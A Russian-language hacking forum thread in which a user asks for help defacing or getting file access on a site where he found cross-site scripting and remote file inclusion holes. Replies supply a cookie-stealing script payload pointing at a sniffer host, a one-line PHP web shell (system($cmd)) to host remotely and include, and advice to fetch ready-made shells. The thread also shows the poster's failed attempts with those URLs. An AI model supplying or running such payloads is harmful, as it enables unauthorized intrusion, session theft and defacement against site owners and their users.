![]() |
На сайте есть дырки. Помогите пожалуйста мне в дальнейшем
Нашел уязвимость. Выполняется JavaScript:
http://www.site.com:443/interesting/index.php?pg=<Sсгiрt>а1егt()</Sсгiрt> Warning: main(../interesting/info/.php): failed to open stream: No such file or directory in /www/hosts/www.site.com/html/interesting/index.php on line 39 Warning: main(): Failed opening '../interesting/info/<Sсгiрt>а1егt()</Sсгiрt>.php' for inclusion (include_path='.:') in /www/hosts/www.site.com/html/interesting/index.php on line 39 Потом просканил. Вот что мне выдал: 1) Серьезная уязвимость Выполнение кода, взятого с удаленного сервера Описание Уязвимость "Code Injection" с помощью запроса: http://www.site.com:443/interesting/...tp://wwwwwwww/ позволяет атакующему выполнять произвольный код, взятый с удаленного сервера. 2) Уязвимость Реальный путь к серверу Описание Возможно получение реального пути к веб-серверу с помощью запроса: http://www.site.com:443/interesting/...tp://wwwwwwww/ Описание Возможно получение реального пути к веб-серверу с помощью запроса: http://www.site.com:443/disks/index.php?pg=1' Описание Возможно получение реального пути к веб-серверу с помощью запроса: http://www.site.com:443/audio/index.php?pg=1' 3) Доступна информация Ссылки с параметрами Описание Список ссылок найденных на веб-сервере, которые используют какие-либо параметры: /interesting/index.php?pg=multios /archive/index.php?pg=010402 /disks/index.php?pg=SeaMed /audio/index.php?pg=Aopen 4) Доступна информация Доступ к директориям Описание Доступные директории: /admin/ /communications/ /proccesors/ /boards/ /video/ /disks/ /audio/ /security/ /interesting/ /archive/ 5) Недоступные директории Описание Cуществующие, но недоступные директории: /cgi-bin/ /forum/ /mp3/ /search/ /tmp/ /includes/ /img/ Помогите пожалуйста, каким образом можно добиться дефейса или же получить доступ к файлам? |
А ты пробовал зайти в доступную admin/?
|
:)
Цитата:
Да, доступ туда есть, там написано: Администратор форума Логин: Пароль: Тока не говори мне что Брутить надо что-то :) мне сказали залить PHP шелл со своево сервака, но я не знаю как это сделать... |
Уязвимость "Code Injection" с помощью запроса:
http://www.site.com:443/interesting...ttp://wwwwwwww/ позволяет атакующему выполнять произвольный код, взятый с удаленного сервера. Ну раз есть такая дыра, то можно судя по всему выполнять команды. Ну вот эту брешь и юзай! Почитай статьи про php source injection и будет тебе счастье. |
Цитата:
вмечто кода алерта подставляй ссылку на снифер. бует примерно так: http:/www.site.com:443/interesting/index.php?pg=<script src="http://adressnifera"+document.cookie;></script> Цитата:
//может чё нить и получиться) |
Цитата:
1) Сниффер молчит.... Вот ответ на заливку сниффера: Warning: main(../interesting/info/.php): failed to open stream: No such file or directory in /www/hosts/www.site.com:443/html/interesting/index.php on line 39 Warning: main(): Failed opening '../interesting/info/<script src=\"http://s.netsec.ru/xxx/pic.gif\" document.cookie;></script>.php' for inclusion (include_path='.:') in /www/hosts/www.site.com/html/interesting/index.php on line 39 2) А как Шелл делать? |
Цитата:
а шел мона просто скачать от сюда а вообще не поленись зайти на яндекс/гугл и поискать что же такое шел и что делают со снифером! |
<?
system($cmd); ?> сохрани как shell.php и залей на народ судя по твоим данным сцылка будет такого вида http://www.site.com:443/interesting/...narod.ru/shell |
|
Попробовал все что вы сказали, через народ залить....
Может JavaScript-ом попробововать??? Вот ответ: Warning: main(../interesting/info/http://cnekmp2005.narod.ru/remview.php.php): failed to open stream: No such file or directory in /www/hosts/www.site.com/html/interesting/index.php on line 39 Warning: main(): Failed opening '../interesting/info/http://cnekmp2005.narod.ru/remview.php.php' for inclusion (include_path='.:') in /www/hosts/www.site.com/html/interesting/index.php on line 39 |
| Время: 08:06 |